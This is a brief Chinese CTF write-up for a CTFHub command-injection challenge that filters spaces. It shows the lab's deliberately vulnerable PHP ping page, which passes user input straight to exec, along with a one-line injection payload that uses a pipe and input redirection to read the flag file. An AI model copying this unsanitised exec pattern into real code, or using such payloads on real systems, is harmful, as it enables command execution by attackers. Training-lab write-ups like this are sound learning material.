ctfhub-过滤空格
作者:互联网
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/ /", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>CTFHub 命令注入-过滤空格</title>
</head>
<body>
<h1>CTFHub 命令注入-过滤空格</h1>
<form action="#" method="GET">
<label for="ip">IP : </label><br>
<input type="text" id="ip" name="ip">
<input type="submit" value="Ping">
</form>
<hr>
<pre>
<?php
if ($res) {
print_r($res);
}
?>
</pre>
<?php
show_source(__FILE__);
?>
</body>
<ml>
代码好像没写什么有用的信息,反正根据题意就是过滤空格
127.0.0.1|cat<flag_11252306893651.php
查看源代码就可以看到
标签:题意,ctfhub,空格,CTFHub,过滤,源代码,注入 来源: https://blog.csdn.net/m0_62094846/article/details/121944962